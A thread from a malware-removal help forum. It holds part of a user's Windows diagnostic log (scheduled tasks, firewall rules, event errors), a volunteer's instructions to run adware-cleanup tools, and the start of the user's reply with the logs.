CustomCLSID: HKU\S-1-5-21-2572138134-34439291-2312372487-1000_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User1\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll => No File
CustomCLSID: HKU\S-1-5-21-2572138134-34439291-2312372487-1000_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User1\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll => No File
CustomCLSID: HKU\S-1-5-21-2572138134-34439291-2312372487-1000_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User1\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll => No File
CustomCLSID: HKU\S-1-5-21-2572138134-34439291-2312372487-1000_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User1\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll => No File

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {050EB29E-C2B0-49CD-948F-8F8B93FC70B9} - System32\Tasks\{973EBCA8-13FC-4FC9-A17B-F72EC28DAA9F} => C:\Users\User1\Desktop\cdrw_usb.exe [2015-09-30] (Hewlett-Packard Company)
Task: {0DC58467-E110-44A2-94AD-91839DBBA2FE} - System32\Tasks\{2D58202E-985D-4C3C-B4DA-3773DA1746A6} => C:\Users\User1\Desktop\cdrw_usb.exe [2015-09-30] (Hewlett-Packard Company)
Task: {16D31C0E-8558-460F-A99F-210908D160B1} - System32\Tasks\Lenovo\LSC\LSCHardwareScan => C:\Program Files\Lenovo\Lenovo Solution Center\LSC.exe [2016-04-20] (Lenovo)
Task: {16F48D39-488A-43A8-ABEB-26161573A3C7} - System32\Tasks\Synaptics TouchPad Enhancements => Program Files\Synaptics\SynTP\SynTPEnh.exe
Task: {1F99488C-6245-4149-AFE5-2A82D9B9ADE7} - System32\Tasks\{C22F8FB1-0C1B-456D-A673-BC7DE9BBC9EA} => pcalua.exe -a C:\Users\User1\Desktop\cdrw_usb.exe -d C:\Users\User1\Desktop
Task: {23B39133-AEC4-4BD6-94AE-1936CA0C6799} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2016-02-23] (Apple Inc.)
Task: {47A82873-906B-482D-B4AF-294B06D7D308} - System32\Tasks\Lenovo\LSC\LSCHardwareScanPostpone => C:\Program Files\Lenovo\Lenovo Solution Center\LSC.exe [2016-04-20] (Lenovo)
Task: {4B7D375C-C218-41F9-91AC-31DB701BEE11} - System32\Tasks\{B53B2FBA-689F-4469-B81D-77A5A2578B6D} => Firefox.exe hxxp://ui.skype.com/ui/0/7.2.0.103/en/eula
Task: {560C6AC3-B0BA-40CE-B442-5B168CFFA7DC} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-06-17] (Adobe Systems Incorporated)
Task: {5CA28A94-E6E1-4617-9452-C891EF58484C} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 => C:\Program Files (x86)\Lenovo\Customer Feedback Program\Lenovo.TVT.CustomerFeedback.Agent.exe [2015-07-01] (Lenovo)
Task: {5FDE3E9F-4EBB-48AF-99EB-B674881BFAC6} - System32\Tasks\Lenovo\Lenovo Solution Center Launcher => C:\Program Files\lenovo\lenovo solution center\App\LSC.Services.UpdateStatusService.exe [2016-04-20] ()
Task: {726F67B6-7A3F-4A9A-B0D7-2E5D20A0E4CC} - System32\Tasks\PMTask => C:\Program Files (x86)\ThinkPad\Utilities\PwmIdTsv.exe [2016-04-14] (Lenovo Group Limited)
Task: {84AC1D00-6E33-4858-86CE-3F5781C417B9} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 35 => C:\Program Files (x86)\Lenovo\Customer Feedback Program 35\Lenovo.TVT.CustomerFeedback.Agent35.exe [2015-08-17] (Lenovo)
Task: {8B8E0E10-B5E7-4A28-8FBE-AA89CFD8E1D9} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-27] (Google Inc.)
Task: {953387FE-BC45-4785-B2D6-DCBFF3E52E78} - System32\Tasks\{E13195ED-6D24-4991-BBC7-755E00EB9873} => Firefox.exe hxxp://ui.skype.com/ui/0/7.2.0.103/en/eula
Task: {99E49901-85B5-49DB-A980-CE181E766BF9} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-27] (Google Inc.)
Task: {B8D62B00-6B07-4574-A388-DAB5084F0413} - System32\Tasks\{28BB1BE4-29E6-40E6-81AA-4B76259079D4} => Firefox.exe hxxp://ui.skype.com/ui/0/7.2.0.103/en/privacy
Task: {C2532CF2-89CD-42F8-88BF-830F5ABBFBCD} - System32\Tasks\TVT\TVSUUpdateTask => C:\Program Files (x86)\Lenovo\System Update\tvsuShim.exe [2016-05-25] ()
Task: {CBF6B82D-2C44-4B2D-97C5-2E01E659577B} - System32\Tasks\Lenovo\LSC\Lenovo Solution Center Notifications => C:\Program Files\Lenovo\Lenovo Solution Center\LSCNotify.exe [2016-04-20] (Lenovo)
Task: {DED424F2-3A49-4F4F-90BA-030ADB2D3DAB} - System32\Tasks\{32F8231C-00E1-45D7-963D-0A5BD7249447} => Firefox.exe hxxp://ui.skype.com/ui/0/7.2.0.103/en/privacy
Task: {E05D9D5D-8774-4F0A-92A9-3E40E891C903} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program => C:\Program Files\Lenovo\Customer Feedback Program\Lenovo.TVT.CustomerFeedback.Agent.exe
Task: {EB9256A1-C6E5-4204-A795-487D2896881B} - System32\Tasks\{167203B5-F0D2-4EA6-A6B4-D55C48ED8AE7} => Firefox.exe hxxp://ui.skype.com/ui/0/7.2.0.103/en/eula

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\User1\Desktop\Backup HD Studd\Meredith's Computer - delete 2-9\2015-01-06\Users\Meredith\Desktop (copied)\Constant Guard Protection Suite.lnk -> hxxp://security.comcast.net/?cid=xfactiv_security (No File)
Shortcut: C:\Users\User1\Desktop\Backup HD Studd\Meredith's Computer - delete 2-9\2015-01-06\Users\Meredith\Desktop (copied)\Live PC Help.lnk -> hxxp://www.thephonesupport.com/?src=dtop (No File)
Shortcut: C:\Users\User1\Desktop\Backup HD Studd\Meredith's Computer - delete 2-9\2015-01-06\Users\Meredith\Desktop (copied)\XFINITY Connect.lnk -> hxxp://www.comcast.net/qry/goto?app=mail&cid=xfactiv_email (No File)
Shortcut: C:\Users\User1\Desktop\Backup HD Studd\Meredith's Computer - delete 2-9\2015-01-06\Users\Meredith\Desktop (copied)\XFINITY TV.lnk -> hxxp://xfinitytv.comcast.net/?cid=xfactiv_tv (No File)

==================== Loaded Modules (Whitelisted) ==============

2014-06-01 19:55 - 2013-04-15 10:50 - 00198144 _____ () C:\Windows\System32\HP1006LM.DLL
2014-06-01 19:56 - 2013-04-15 10:50 - 00065024 _____ () C:\Windows\system32\spool\PRTPROCS\x64\HP1006PP.dll
2014-06-01 19:55 - 2013-04-15 10:49 - 04003328 _____ () C:\Windows\system32\spool\DRIVERS\x64\3\HP1006SU.DLL
2014-06-01 19:55 - 2013-04-15 10:49 - 01236992 _____ () C:\Windows\system32\spool\DRIVERS\x64\3\HP1006GC.dll
2016-05-20 09:30 - 2016-04-14 06:08 - 00107008 _____ () C:\Program Files (x86)\ThinkPad\Utilities\US\PWMRT64V.DLL
2014-05-01 14:29 - 2014-05-01 14:29 - 00098304 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext_64.dll
2016-03-18 22:56 - 2016-03-18 22:56 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2016-04-22 01:07 - 2016-04-22 01:07 - 01337144 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2016-04-21 15:44 - 2005-04-21 23:36 - 00143360 _____ () C:\Windows\system32\BrSNMP64.dll
2014-05-16 11:22 - 2013-11-16 05:37 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2014-07-21 10:18 - 2014-06-23 20:47 - 00601376 _____ () C:\Program Files\Lenovo\Password Manager\pwm_website_config.dll
2014-06-01 19:55 - 2013-04-15 10:50 - 00343552 _____ () C:\Windows\system32\spool\DRIVERS\x64\3\HP1006SD.DLL
2016-04-22 01:07 - 2016-04-22 01:07 - 00313656 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxslt.dll
2014-12-11 15:15 - 2014-12-11 15:15 - 00078880 _____ () C:\Program Files\Realtek\Audio\HDA\FMAPP.exe
2014-05-30 17:29 - 2011-08-02 20:58 - 02201088 _____ () C:\Program Files\Lenovo\Communications Utility\cxcore210.dll
2014-05-30 17:29 - 2011-08-02 20:58 - 02085888 _____ () C:\Program Files\Lenovo\Communications Utility\cv210.dll
2015-02-22 07:41 - 2015-02-22 07:41 - 00110592 ____R () C:\Program Files (x86)\Amazon\Amazon Unbox Video\LimelightDownloadManager.dll
2016-04-21 15:44 - 2009-02-27 16:38 - 00139264 ____R () C:\Program Files (x86)\Brother\BrUtilities\BrLogAPI.dll
2014-06-23 20:44 - 2014-06-23 20:44 - 00546592 _____ () C:\Program Files (x86)\Lenovo\Password Manager\pwm_website_config.dll
2016-02-26 17:11 - 2016-04-29 15:10 - 00785920 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2016-02-26 17:11 - 2015-07-03 11:12 - 04962816 _____ () C:\Program Files (x86)\Steam\v8.dll
2016-02-26 17:11 - 2015-07-03 11:12 - 01556992 _____ () C:\Program Files (x86)\Steam\icui18n.dll
2016-02-26 17:11 - 2015-07-03 11:12 - 01187840 _____ () C:\Program Files (x86)\Steam\icuuc.dll
2016-02-26 17:11 - 2016-06-14 19:47 - 02387024 _____ () C:\Program Files (x86)\Steam\video.dll
2016-02-26 17:11 - 2016-02-08 18:14 - 02549760 _____ () C:\Program Files (x86)\Steam\libavcodec-56.dll
2016-02-26 17:11 - 2016-02-08 18:14 - 00442880 _____ () C:\Program Files (x86)\Steam\libavutil-54.dll
2016-02-26 17:11 - 2016-02-08 18:14 - 00491008 _____ () C:\Program Files (x86)\Steam\libavformat-56.dll
2016-02-26 17:11 - 2016-02-08 18:14 - 00332800 _____ () C:\Program Files (x86)\Steam\libavresample-2.dll
2016-02-26 17:11 - 2016-02-08 18:14 - 00485888 _____ () C:\Program Files (x86)\Steam\libswscale-3.dll
2016-02-26 17:11 - 2016-06-14 19:47 - 00829008 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2016-03-08 23:35 - 2016-02-17 17:25 - 00281088 _____ () C:\Program Files (x86)\Steam\openvr_api.dll
2016-02-26 17:11 - 2016-06-14 14:14 - 49826080 _____ () C:\Program Files (x86)\Steam\bin\libcef.dll
2014-05-30 17:34 - 2013-12-03 12:36 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
2015-07-14 18:20 - 2015-07-14 18:20 - 00756376 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE12\MSPTLS.DLL
2014-08-13 09:09 - 2014-08-13 09:09 - 00035328 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext.dll
2014-05-24 11:41 - 2014-05-24 11:41 - 00091648 _____ () C:\Program Files (x86)\FileZilla FTP Client\libgcc_s_sjlj-1.dll
2014-05-24 11:41 - 2014-05-24 11:41 - 00892416 _____ () C:\Program Files (x86)\FileZilla FTP Client\libstdc++-6.dll
2016-04-22 01:08 - 2016-04-22 01:08 - 01047864 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2016-03-18 22:56 - 2016-03-18 22:56 - 00080184 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2016-04-06 23:53 - 2015-09-12 05:03 - 00195584 _____ () C:\Program Files (x86)\Scrivener\QtSolutions_MMLWidget-2.4.dll
2016-04-06 23:53 - 2002-12-19 23:41 - 01364823 _____ () C:\Program Files (x86)\Scrivener\Aspell\bin\aspell-15.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2572138134-34439291-2312372487-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\User1\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{42DE4584-70BA-4E32-9208-BB52CEFAF8DE}] => (Allow) C:\Program Files\Intel Corporation\Intel WiDi\WiDiApp.exe
FirewallRules: [{FB8C0C5A-06A1-4414-82C8-A7821A3B5E74}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{CF6F66CA-FA5A-4DE5-9371-B1E5BBA96B99}C:\users\user1\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\user1\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [UDP Query User{AD29E40F-5D45-42B7-B0D0-3810BD85C2C0}C:\users\user1\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\user1\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [{983A3230-DB8F-4BB0-A52D-D7F92FCD1297}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
FirewallRules: [{D762B936-46C9-4444-9D73-3F1E92C71ED9}] => (Allow) C:\Users\User1\AppData\Local\Temp\nsi3B18.tmp\CnetInstaller-10863331.exe
FirewallRules: [{0F6B868C-F02D-48E0-A76B-79D7EB9CBB8B}] => (Allow) C:\Users\User1\AppData\Local\Temp\nsi3B18.tmp\CnetInstaller-10863331.exe
FirewallRules: [{BED21FF6-C104-473A-9A51-407AED9BEFDA}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{3B28AA31-4793-4D0C-AFE7-F8040AB55873}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{0435B6C1-EC17-4127-A73A-E81FD04CB7AB}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{5DB4D6BE-26D6-4C09-8B89-D3EBA46C1156}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) %systemroot%\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\SMSvcHost.exe
FirewallRules: [{4EF3F7AD-A7B2-4069-AAF1-353C7166C049}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{68BBFCC5-0273-4777-B720-AD8E72BD0E7F}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{D195F671-4CFA-4140-AF86-B7A249934111}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{B752D27C-F5CA-4F3B-B10D-CC6725B75B9E}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{4A2FEE2C-8BCA-4702-9B1A-DF00432A5C01}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{CB6AA92E-D768-44E3-AF67-4C5886584B07}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A4B6CA1C-CBD0-4E35-802F-2870FEBD1178}] => (Allow) C:\Users\User1\Desktop\PDFCombine-74674127.exe
FirewallRules: [{FB1FBFA1-9AFE-4258-9238-DCE425D978DE}] => (Allow) C:\Users\User1\Desktop\PDFCombine-74674127.exe
FirewallRules: [{2D6C4B04-24D7-4BC6-BA5D-6EFEF6665EDF}] => (Allow) C:\Program Files (x86)\Lenovo\SHAREit\SHAREit.exe
FirewallRules: [{FC9AD853-0C49-44CD-8BFA-DEA5E40BBF8C}] => (Allow) C:\Program Files (x86)\Lenovo\SHAREit\SHAREit.exe
FirewallRules: [{1F29B9BD-0BAB-42F0-BE07-6DD64CCA36D3}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{FB3F4683-1893-4CAF-A532-7F512CEDE7B8}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{D96E1F9A-376B-4FB1-9833-8D487727CE5D}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{F634337A-61AF-40D9-9AC6-0292FE238503}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{22F79A5F-B099-4C99-B69C-E1983AF0D3DD}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\OrganTrailDC\OrganTrail.exe
FirewallRules: [{C0CBC54B-BFB9-4080-87DF-A6CD673AA249}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\OrganTrailDC\OrganTrail.exe
FirewallRules: [{466D5510-402C-471F-84E8-ED30B8A8E300}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Bottom of the Well\bottomofthewell.exe
FirewallRules: [{C85B70F1-0897-49FB-B404-0A9C3870BA39}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Bottom of the Well\bottomofthewell.exe
FirewallRules: [{BEA5BFF0-4F23-44C4-98BD-494DFFC68210}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\To Burn in Memory\nw.exe
FirewallRules: [{082C4761-312B-41DF-9068-0B6A88AEF097}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\To Burn in Memory\nw.exe
FirewallRules: [{DCAF376F-DBC8-4E1A-874B-90ABA08AE260}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Trine 2\trine2_launcher.exe
FirewallRules: [{E2C3EFF7-180C-4B20-B2D4-C7367215D577}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Trine 2\trine2_launcher.exe
FirewallRules: [{9CCD6B1D-6502-487B-8CB6-2F3FD621C89D}] => (Allow) C:\Program Files (x86)\Brother\Brmfl13c\FAXRX.EXE
FirewallRules: [{E6C9A777-8E11-46EF-AC8E-DB85CEF0EFA4}] => (Allow) LPort=54925
FirewallRules: [{0F8890D9-395B-4C9D-B431-CF0CD6DEAE7A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Kings Bounty Crossworlds\KB.exe
FirewallRules: [{010D9204-B1D8-4F28-A068-28837E23851B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Kings Bounty Crossworlds\KB.exe
FirewallRules: [{48724F8F-179E-4C69-BD9C-F3F642951DE8}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{E4317D68-3C11-433C-AF1E-F93E0BBF7B35}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{E4D8F78C-C93F-4D64-8D7D-460BACE2DCED}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\uncserver.exe
FirewallRules: [{D6D3FE4D-B3C5-46DD-8405-A4739A15C9DC}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\uncserver.exe

==================== Restore Points =========================

02-06-2016 01:57:57 Scheduled Checkpoint
10-06-2016 02:59:39 Scheduled Checkpoint
19-06-2016 18:32:24 Scheduled Checkpoint
28-06-2016 01:56:26 Scheduled Checkpoint

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (07/03/2016 05:58:53 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 1060

Error: (07/03/2016 05:58:53 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 1060

Error: (07/03/2016 05:58:53 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (07/03/2016 12:51:39 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program EXCEL.EXE version 12.0.6729.5000 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 12ac

Start Time: 01d1cbd386857ed4

Termination Time: 0

Application Path: C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE

Report Id: 28d4a3a0-40e2-11e6-a6d8-f4b7e2e86230

Error: (07/02/2016 06:10:05 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 1061

Error: (07/02/2016 06:10:05 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 1061

Error: (07/02/2016 06:10:05 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (07/01/2016 02:18:39 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: plugin-container.exe, version: 47.0.1.6018, time stamp: 0x576c9637
Faulting module name: mozglue.dll, version: 47.0.1.6018, time stamp: 0x576c85ba
Exception code: 0x80000003
Fault offset: 0x0000f02b
Faulting process id: 0x3648
Faulting application start time: 0xplugin-container.exe0
Faulting application path: plugin-container.exe1
Faulting module path: plugin-container.exe2
Report Id: plugin-container.exe3

Error: (07/01/2016 06:13:50 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 1077

Error: (07/01/2016 06:13:50 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 1077


System errors:
=============
Error: (06/28/2016 03:45:06 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the AudioEndpointBuilder service.

Error: (06/21/2016 10:27:46 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Steam Client Service service failed to start due to the following error:
%%1053 = The service did not respond to the start or control request in a timely fashion.


Error: (06/21/2016 10:27:46 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Steam Client Service service to connect.

Error: (06/21/2016 10:25:33 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)

Error: (06/21/2016 10:25:13 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)

Error: (06/20/2016 08:21:24 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The System Update service terminated unexpectedly.  It has done this 1 time(s).

Error: (06/01/2016 09:48:09 AM) (Source: volsnap) (EventID: 36) (User: )
Description: The shadow copies of volume C: were aborted because the shadow copy storage could not grow due to a user imposed limit.

Error: (06/01/2016 04:37:07 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Amazon Unbox Video Service service terminated unexpectedly.  It has done this 1 time(s).

Error: (05/31/2016 10:43:09 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the AcSvc service.

Error: (05/31/2016 10:43:09 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the AcPrfMgrSvc service.


CodeIntegrity:
===================================
  Date: 2016-05-16 12:52:14.479
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-04-14 13:37:23.489
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-03-30 13:44:47.000
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-03-23 13:18:22.822
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

  Date: 2015-09-29 13:41:53.208
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

  Date: 2015-09-01 10:47:18.894
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

  Date: 2015-08-22 15:59:24.218
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

  Date: 2015-08-22 13:58:58.255
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

  Date: 2015-08-22 13:44:52.653
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

  Date: 2015-07-14 14:18:02.042
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.


==================== Memory info ===========================

Processor: Intel® Core™ i5-3320M CPU @ 2.60GHz
Percentage of memory in use: 50%
Total physical RAM: 11984.8 MB
Available physical RAM: 5877.61 MB
Total Virtual: 23967.8 MB
Available Virtual: 18075.09 MB

==================== Drives ================================

Drive c: (Windows7_OS) (Fixed) (Total:287.35 GB) (Free:37.66 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive q: (Lenovo_Recovery) (Fixed) (Total:9.77 GB) (Free:6.12 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 298.1 GB) (Disk ID: 4B3E34C6)
Partition 1: (Active) - (Size=1000 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=287.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=9.8 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================


Edited by starsknight, 03 July 2016 - 10:51 PM.

  • 0

Advertisements


#2
zep516

zep516

    Trusted Helper

  • Malware Removal
  • 6,806 posts
Hi! My name is zep516 and Welcome to Geekstogo!
I'll do the best I can to resolve your computer issue
Please make sure to carefully read any instruction that I give you. If you're not sure, or if something unexpected happens, don't continue Stop and ask! Never be afraid to ask questions! :)

First

Please remove this program from your program an features list.

--->Tiny Download Manager.

Next

Please download AdwCleaner by Xplode onto your Desktop.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click the Scan button and wait for the process to complete.
  • Click the logfile button and the log will open in Notepad.
  • Click on the Clean button follow the prompts.
  • A log file will automatically open after the scan has finished and the PC has rebooted.
  • Please post the content of that log file with your next answer.
  • The report will be saved in the C:\AdwCleaner folder.

    Next

    Please download Junkware Removal Tool to your Desktop.
    Please close your security software to avoid potential conflicts. See Here how to disable you security protection (Anti Virus)
    Run the tool by double-clicking it. If you are using Windows Vista or 7, right-mouse click it and select Run as administrator.
    The tool will open and start scanning your system.
    Please be patient as this can take a while to complete, depending on your system's specifications.
    On completion, a log (JRT.txt) is saved to your Desktop and will automatically open.
    Please post the contents of JRT.txt into your reply.


    In your next reply post;
  • The AdwCleaner [SO].txt Log
  • The JRT.txt Log

  • 0

#3
starsknight

starsknight

    Member

  • Topic Starter
  • Member
  • PipPip
  • 30 posts

Hi there!

 

Thanks for your help. You referenced the "The AdwCleaner [SO].txt Log" - the filename that was auto-generated for the log after cleanup was complete was [C1]. The pre-cleanup one was [S1]. I wasn't certain which you needed, so I've included both below. If you need anything else, please let me know!

 

Here are the logs:

 

